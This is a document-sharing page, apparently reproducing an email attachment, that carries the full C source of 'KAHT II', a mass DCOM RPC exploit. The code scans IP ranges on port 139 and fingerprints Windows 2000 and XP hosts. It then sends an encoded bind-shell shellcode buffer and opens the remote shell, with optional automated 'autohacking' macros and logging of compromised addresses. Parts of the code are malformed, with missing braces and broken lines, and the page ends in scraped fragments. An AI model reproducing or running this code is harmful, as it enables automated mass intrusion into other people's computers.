Berikut Adalah Lampiran Dalam Pesan: Kaht.C: Miswar Ramadhan

Tampilan Penuh
ini li
...
Dari: Miswar Ramadhan <misward_wardzone@yahoo.com>
...
Tambah ke Kontak
Kepada: ali_fkusk@yahoo.com
KaHt.c (26KB)
Berikut adalah Lampiran dalam Pesan: KaHt.c

/*
__________________________________________________
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4r@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
REALLY PRIVATE VERSION (BETA 11) - AUTOHACKING
Ported to Linux by Croulder croulder[at]croulder.com
__________________________________________________
*/
#include <stdio.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include <unistd.h>
#include <windows.h>
#include <process.h>
#include <winsock2.h>
#include <tcconio.h>
#pragma comment (lib,"ws2_32.lib")
#else
#include <pthread.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/sem.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <fcntl.h>
#include <unistd.h>
#endif
#define MAX_THREADS 512

#define NTHREADS 50
#define PORT 139
#define CONNECT 6 //Connect Timeout
#define RECV 5 //recv Timeout
#define ATTACKTIMEOUT 5 //
#define RPC_FINGERPRINT_TIMEOUT 6 //rpc fingerprint
#define INITRPORT (rand()/2)+32767
//#define INITRPORT 53 //PORT TO SPAWN A SHELL
int RPORT,salir=0,AUTOHACKING=0,threads=0,rpcopen=0;
int ip1[4],ip2[4];
FILE *results; //results.txt ips con el puerto 139 abierto :D
#ifndef WIN32
#define CRITICAL_SECTION pthread_t
#endif
CRITICAL_SECTION cs,css,cslog,csshell; //Givemeip CS, number of threads,
ipstologfile,shell()
//Ultra Fast port Scanner
char *givemeip(char *ip);
void checkea(void *threadn);
//Macro Functions..
void show_macros(int sock2);
void execute_macro(char opt,int sock2);
void macro(char opt, int sock2);
//Exploit Code...
void attack(char *linea,int peta);
int shell (int sock2);
void readconsole(void *sock2);
//me
void banner(void);
// remote Install
int InstallRemoteServiceNbt (char *ip);
int InstallRemoteServiceFtp (char *ip);
unsigned char bindstr[]={

0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char winshellcode[]=

"\x05\x00\x00\x03\x10\x00\x00\x00\xa8\x06\x00\x00\xe5\x00\x00\x00"
"\x90\x06\x00\x00\x01\x00\x04\x00\x05\x00\x06\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x32\x24\x58\xfd\xcc\x45\x64\x49\xb0\x70\xdd\xae"
"\x74\x2c\x96\xd2\x60\x5e\x0d\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x70\x5e\x0d\x00\x02\x00\x00\x00\x7c\x5e\x0d\x00\x00\x00\x00\x00"
"\x10\x00\x00\x00\x80\x96\xf1\xf1\x2a\x4d\xce\x11\xa6\x6a\x00\x20"
"\xaf\x6e\x72\xf4\x0c\x00\x00\x00\x4d\x41\x52\x42\x01\x00\x00\x00"
"\x00\x00\x00\x00\x0d\xf0\xad\xba\x00\x00\x00\x00\xa8\xf4\x0b\x00"
"\x20\x06\x00\x00\x20\x06\x00\x00\x4d\x45\x4f\x57\x04\x00\x00\x00"
"\xa2\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
"\x38\x03\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
"\x00\x00\x00\x00\xf0\x05\x00\x00\xe8\x05\x00\x00\x00\x00\x00\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\xc8\x00\x00\x00\x4d\x45\x4f\x57"
"\xe8\x05\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
"\x00\x00\x00\x00\xc4\x28\xcd\x00\x64\x29\xcd\x00\x00\x00\x00\x00"
"\x07\x00\x00\x00\xb9\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xab\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xa5\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xad\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xaa\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x30\x00\x00\x00\x01\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc"
"\x50\x00\x00\x00\x4f\xb6\x88\x20\xff\xff\xff\xff\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc"
"\xc0\x00\x00\x00\x00\x00\x00\x46\x10\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x78\x19\x0c\x00"
"\x58\x00\x00\x00\x05\x00\x06\x00\x01\x00\x00\x00\x70\xd8\x98\x93"
"\x98\x4f\xd2\x11\xa9\x3d\xbe\x57\xb2\x00\x00\x00\x32\x00\x31\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x80\x00\x00\x00\x0d\xf0\xad\xba"
"\x4d\x45\x4f\x57\x04\x00\x00\x00\xc0\x01\x00\x00\x00\x00\x00\x00"
"\xc0\x00\x00\x00\x00\x00\x00\x46\x3b\x03\x00\x00\x00\x00\x00\x00"
"\xc0\x00\x00\x00\x00\x00\x00\x46\x00\x00\x00\x00\x30\x00\x00\x00"
"\x01\x00\x01\x00\x81\xc5\x17\x03\x80\x0e\xe9\x4a\x99\x99\xf1\x8a"
"\x50\x6f\x7a\x85\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x30\x00\x00\x00\x78\x00\x6e\x00"
"\x00\x00\x00\x00\xd8\xda\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x20\x2f\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x10\x00\x00\x00\x30\x00\x2e\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x68\x00\x00\x00\x0e\x00\xff\xff"
"\x68\x8b\x0b\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x86\x01\x00\x00\x00\x00\x00\x00\x86\x01\x00\x00\x5c\x00\x5c\x00"
"\x46\x00\x58\x00\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x9f\x75\x18\x00\xcc\xe0\xfd\x7f\xcc\xe0\xfd\x7f"
"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\x40\xa1\x1f\x4c\xd5\x24\xc5\xd3"
"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04\x00\x5c\x00\x43\x00"
"\x24\x00\x5c\x00\x31\x00\x32\x00\x33\x00\x34\x00\x35\x00\x36\x00"
"\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x2e\x00"
"\x64\x00\x6f\x00\x63\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc"
"\x20\x00\x00\x00\x30\x00\x2d\x00\x00\x00\x00\x00\x88\x2a\x0c\x00"
"\x02\x00\x00\x00\x01\x00\x00\x00\x28\x8c\x0c\x00\x01\x00\x00\x00"
"\x07\x00\x00\x00\x00\x00\x00\x00";
struct
{
char *os;
u_long ret;
} targets[] =
{
{ "[Win2k]", 0x0018759F },
{ "[WinXP]", 0x0100139d },
};
//GLOBALS...
/******************************************************************/
void banner(void)
{
printf ("_________________________________________________ \n");
printf(" KAHT II - MASSIVE RPC EXPLOIT\n");
printf(" DCOM RPC exploit. Modified by aT4r@3wdesign.es\n");
printf(" #haxorcitos && #localhost @Efnet Ownz you!!!\n");
printf(" PUBLIC VERSION :P\n");
printf ("________________________________________________\n\n");
}
void usage(void)
{
printf(" Usage: KaHt2.exe IP1 IP2 [THREADS] [AH]\n");
printf(" example: KaHt2.exe 192.168.0.0 192.168.255.255\n");
printf("\n NEW!: Macros Available in shell enviroment!!\n Type !! for more info into a
shell.\n");
//printf(" If AUTOHACKING ENABLED MACRO !9 WILL BE EXECUTED\n");
exit(1);
}
/******************************************************************/
/*****************************************************************/
void execute_macro(char opt,int sock2){
FILE *macro;

char cadena[512];
char tmp[512];
int found=0;
int delay=500; //configurable TIMEOUT FOR CMDS - Default=500
if ((macro=fopen("macros.txt","r")) !=NULL)
{
while (!feof(macro))
{
memset(cadena,'\0',sizeof(cadena));
fgets(cadena,sizeof(cadena)-1,macro);
cadena[strlen(cadena)-1]='\0';
if ((found==1) && (( strncmp(cadena,"[Macro]",strlen("[Macro]"))) ==0) )
{
fclose(macro);
printf(" + Ejecucion de La Macro Terminada\n");
fclose(macro);return;}
if (( strncmp(cadena,"delay=",strlen("delay="))) ==0)
delay=atoi(cadena+6);
if (( strncmp(cadena,"key=",strlen("key="))) ==0)

if (( cadena+strlen("key=!"))[0]==opt)
found=1; //OUR CMDS ARE HERE! :)
if ( (( strncmp(cadena,"cmd=",strlen("cmd="))) ==0) && (found) )
if (strlen(cadena)>strlen("cmd= "))
{
strcpy(tmp,cadena+4);
strcat(tmp,"\r\n");
send(sock2,tmp,strlen(tmp),0);
//printf("Enviado: %s! de tamaño: %i\n",tmp,sizeof(tmp));
sleep(delay);
}
}
fclose(macro);
send(sock2,"\n",strlen("\n"),0);
printf(" - Macro Done -\n");
}
sleep(25);
/*****************************************************************/
void show_macros(int sock2){
FILE *macro;
char cadena[512];
printf(" +______________(Available Macros)______________\n");

if ((macro=fopen("macros.txt","r")) !=NULL)
{
while (!feof(macro))
{
memset(cadena,'\0',512);
fgets(cadena,sizeof(cadena)-1,macro);
if (strlen(cadena)>1)
{
cadena[strlen(cadena)-1]='\0';
if (( strncmp(cadena,"name=",strlen("name="))) ==0)
printf(" + Nombre: %s ",cadena+strlen("name="));
if ((strncmp(cadena,"key=",strlen("key="))) ==0)
printf("Trigger: %s\n",cadena+strlen("key="));
}
}
fclose(macro);
}
send(sock2,"\n",strlen("\n"),0);
sleep(10);
}
/*****************************************************************/
void macro(char opt, int sock2)

{
switch(opt)
{
case '!':
show_macros(sock2);
break;
default:
execute_macro(opt,sock2);
break;
}
}
/*****************************************************************/
void readconsole(void *sock2)
{
int l;
char buf[512];
if (AUTOHACKING) {
execute_macro('9',(int) sock2);
salir=1;
}
while(!salir)
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
salir=1;
else
{
if ( (l==3) && (buf[0]=='!') )
macro(buf[1],(int)sock2);
else
{
send((int)sock2,buf,l,0);
if (strncmp(buf,"exit",strlen("exit")) ==0)
{
salir=1;
_endthread();
}
}
}
}
void enviamacro(void *sock2)

{
sleep(500);
macro(9,(int)sock2);
salir=1;
_endthread();
/****************************************************************/
int shell (int sock2) /* NOT RIPPED FROM TESO :P */
{
int l;
char buf[512];
salir=0;
_beginthread(readconsole,4096,(void *)(int) sock2);
while (!salir)
{
if ((l=recv (sock2, buf, sizeof (buf),0))>0)
write (1, buf, l);
else sleep(100);
}
printf("\n - Connection Closed\n");
return (salir);
}
/*****************************************************************/
int main(int argc, char **argv)

{
int i,total=NTHREADS;
#ifdef WIN32
WSADATA ws;
clrscr();
#endif
banner();
if(argc<3)
usage();
#ifdef WIN32
if (WSAStartup(MAKEWORD(2,0),&ws)!=0)
{
printf(" WSAStartup Error: %d\n",WSAGetLastError());
exit(1);
}
#endif
sscanf (argv[1], "%d.%d.%d.%d", &ip1[0],&ip1[1],&ip1[2],&ip1[3]);
sscanf (argv[2], "%d.%d.%d.%d", &ip2[0],&ip2[1],&ip2[2],&ip2[3]);
for(i=0;i<4;i++)
{
if ( (ip1[i]>255) || (ip1[i]<0) ) usage();
if ( (ip2[i]>255) || (ip2[i]<0) ) usage();
}
if (argc==4) total=atoi(argv[3]);
if (argc==5) AUTOHACKING=atoi(argv[4]);
#ifdef WIN32
InitializeCriticalSection(&cs);
InitializeCriticalSection(&css);
InitializeCriticalSection(&cslog);
InitializeCriticalSection(&csshell);
#else
//Aqui meter los thread de linux :D y semaforos
#endif
//ULTRA FAST PORT SCANNER....
if ((results=fopen("results.txt","w"))==NULL) exit(0);
printf(" [+] Targets: %s-%s with %i Threads\n",argv[1],argv[2],total);
srand ( time(NULL) ); RPORT=INITRPORT;
printf(" [+] Attacking Port: %i. Remote Shell at port: %i\n",PORT,RPORT);
printf(" [+] Scan In Progress...\n");
for(i=0;i<total;i++)
#ifdef WIN32
_beginthread(checkea,8192,(void *)i);
#else
//Aqui meter los thread de linux :D y semaforos
#endif
while(threads>0)
sleep(100);
fclose(results);
printf("\n [+] Scan Finished. Found %i open ports\n",rpcopen);
return(0);
}
/*****************************************************************************
***********/
//void attack(char *linea,int peta)

void attack(char *linea,int peta)
{
if (peta==-1) return;
// if (AUTOHACKING!=1)
#ifdef WIN32
struct timeval tv;
#else
struct time_t tv;
#endif
struct sockaddr_in target_ip;
int sock,sock2; //Exploit Socket && Shell Socket
unsigned short port = 139;
unsigned short lportl=666; /* drg */

char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */
unsigned char buf1[0x1000];
u_long tmp=1; //TIMEOUTS
FILE *w2k;
FILE *wxp;
int i;
fd_set fds;
//linea[strlen(linea-1)]='\0';
EnterCriticalSection(&csshell);
target_ip.sin_family = AF_INET;

target_ip.sin_addr.s_addr = inet_addr(linea);
target_ip.sin_port = htons(port);
if ((sock=socket(AF_INET,SOCK_STREAM,0)) != -1)
{
printf(" - Connecting to %s\n",linea);
tmp=1;

ioctlsocket( sock, FIONBIO, &tmp);
tv.tv_sec = CONNECT;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock, &fds);
connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip));

//if((i=select(sock+1,0,&fds,0,&tv))!=SOCKET_ERROR)
// if (i!=0)
if((i=select(sock+1,0,&fds,0,&tv))>0)
{
printf(" Sending Exploit to a %s Server...",targets[peta].os);
tmp=0;
if (send(sock,bindstr,sizeof(bindstr),0)>0)
{
tmp=1;
tv.tv_sec = RECV;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock, &fds);
if(select(sock +1, &fds, NULL, NULL, &tv) > 0)
{
recv(sock, buf1, 1000, 0);
lportl=htons(RPORT);

memcpy(&lport[1], &lportl, 2);
*(long*)lport = *(long*)lport ^ 0x9432BF80;
memcpy(&winshellcode[1351],&lport,4);
memcpy(winshellcode+916, (unsigned char *) &targets[peta].ret, 4);
tmp=0;
send(sock,winshellcode,1705,0);

sleep(50);
if ((sock2=socket(AF_INET,SOCK_STREAM,0)) !=-1)
{
target_ip.sin_addr.s_addr = inet_addr(linea);
target_ip.sin_port = htons(RPORT);
tmp=1;
ioctlsocket( sock2, FIONBIO, &tmp);
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock2, &fds);
connect(sock2,(struct sockaddr *)&target_ip, sizeof(target_ip));
{
printf("\n - Conectando con la Shell Remota...\n\n");
salir=0;
shell(sock2);
#ifdef WIN32
closesocket(sock2);
#else
close(sock2);
#endif
strcat(linea,"\n");
if (peta==0)
{
w2k=fopen("win2k.txt","a");
if (w2k!=NULL)
{ fputs(linea,w2k); fclose(w2k);}
else printf(" !!UNABLE TO LOG IP %s",linea);
}

else
{
wxp=fopen("winxp.txt","a");

if (wxp!=NULL)
{fputs(linea,wxp); fclose(wxp);}
else printf(" !!UNABLE TO LOG IP %s",linea);
}
//} else printf("UNABLE TO CONNECT TO SHELL\n");
} else printf("FAILED\n");
}
else printf("\n UNABLE TO CREATE SOCK2\n");
}
else printf(" FAILED to send Exploit2\n");
}
else printf(" FAILED to send Exploit\n");
}
}
//if (AUTOHACKING!=1)
LeaveCriticalSection(&csshell);
/*****************************************************************************
****/
char *givemeip(char *ip)
{
EnterCriticalSection(&cs);
if (ip1[3]!=254)
ip1[3]++;
else
{
ip1[2]++;
ip1[3]=1;
//return(NULL); //uhh!
}
if (ip1[2]==255)
{ ip1[2]++; ip1[1]++;}
LeaveCriticalSection(&cs);
if (ip1[2]>ip2[2]) return(NULL);

if (ip1[2]==ip2[2])
if (ip1[3]>ip2[3]) return(NULL);
sprintf(ip,"%d.%d.%d.%d",ip1[0],ip1[1],ip1[2],ip1[3]);
return(ip);
}
/*****************************************************************************
*/
//int version(char *ip, int sock)
int version(char ip[16], int sock)

{
//sacado por ingenieria inversa del Scanner de ISS.
unsigned char peer0_0[] = {

0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18,
0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00,
0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00,
0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11,
0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57,
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00,
0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41,
0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d,
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97,
0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0,
0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00 };
unsigned char peer0_1[] = {

0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00,
0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41,
0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20,
0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53,
0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00,
0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11,
0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb,
0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00,
0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00,
0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00,
0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00,
0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00,
0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46,
0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x07, 0x00 };
/*
unsigned char win2kvuln[] = {

0x04, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00};
*/
fd_set fds2;
unsigned char buf[1024];
int l;
struct timeval tv2;
FD_ZERO(&fds2);
FD_SET(sock, &fds2);
tv2.tv_sec = RPC_FINGERPRINT_TIMEOUT;
tv2.tv_usec = 0;
memset(buf,'\0',sizeof(buf));
send(sock,peer0_0,sizeof(peer0_0),0);
if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
{
l=recv (sock, buf, sizeof (buf),0);
// for(i=0;i<52;i++)
// {
// if (i==28) i=i+4;
// if (buf[i+32]!=win2kvuln[i])
// {
send(sock,peer0_1,sizeof(peer0_1),0);
if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
{
memset(buf,'\0',sizeof(buf));
l=recv (sock, buf, sizeof (buf),0);
if (l==32)
{
closesocket(sock);
return(1);//winxp
}
else
{
#ifdef WIN32
closesocket(sock);
#else
close(sock);
#endif
return(0);//Unknown
}
}
else return(-1);
// }
//}

// closesocket(sock);
// return(0);//win2k
}
closesocket(sock);
return(-1); //Unknown
}
/*****************************************************************************
***/
void checkea(void *threadn)

{
char ip[16];
char ip2[17];
int sock,i;
struct sockaddr_in target_ip;
fd_set fds;
u_long tmp=1;
struct timeval tv;
EnterCriticalSection(&css);
threads++;
sleep(1);
LeaveCriticalSection(&css);
memset(ip,'\0',sizeof(ip));
while (givemeip(ip)!=NULL)
{
//printf("Checkeando IP: %s\n",ip);
target_ip.sin_addr.s_addr = inet_addr(ip);
target_ip.sin_port = htons(139);
closesocket(sock);
if ((sock=socket(AF_INET,SOCK_STREAM,0)) != -1)
{
tmp=1;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock, &fds);
connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip));

//if((i=select(sock+1,0,&fds,0,&tv))==SOCKET_ERROR) { }
//if((i=select(sock+1,0,&fds,0,&tv))==SOCKET_ERROR) { }
// else if (i==0) {
// printf("i==0 ip: %s\n",ip); }
// else
{
sprintf(ip2,"%s\n",ip);
EnterCriticalSection(&cslog);
fputs(ip2,results);
rpcopen++;
LeaveCriticalSection(&cslog);
attack(ip,version(ip,sock));
}
}
closesocket(sock);
memset(ip,'\0',sizeof(ip));
}
EnterCriticalSection(&css);
threads--;
sleep(1);
LeaveCriticalSection(&css);
//printf("Thread %i saliendo\n",(int)threadn);
_endthread();
/*****************************************************************************
*/

Berikut Adalah Lampiran Dalam Pesan: Kaht.C: Miswar Ramadhan

Uploaded by

Document Informationclick to expand document information

Copyright:

Available Formats

Berikut Adalah Lampiran Dalam Pesan: Kaht.C: Miswar Ramadhan

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Berikut Adalah Lampiran Dalam Pesan: Kaht.C: Miswar Ramadhan

Uploaded by

Copyright:

Available Formats

Tampilan Penuh

Berikut adalah Lampiran dalam Pesan: KaHt.c

#define MAX_THREADS 512

unsigned char bindstr[]={

unsigned char winshellcode[]=

FILE *macro;

if (( strncmp(cadena,"key=",strlen("key="))) ==0)

printf(" +______________(Available Macros)______________\n");

void macro(char opt, int sock2)

void enviamacro(void *sock2)

int main(int argc, char **argv)

//void attack(char *linea,int peta)

unsigned short lportl=666; /* drg */

target_ip.sin_family = AF_INET;

tmp=1;

connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip));

lportl=htons(RPORT);

send(sock,winshellcode,1705,0);

}

wxp=fopen("winxp.txt","a");

if (ip1[2]>ip2[2]) return(NULL);

//int version(char *ip, int sock)

int version(char ip[16], int sock)

unsigned char peer0_0[] = {

unsigned char peer0_1[] = {

unsigned char win2kvuln[] = {

//}

void checkea(void *threadn)

connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip));

You might also like

printf(" +(Available Macros)\n");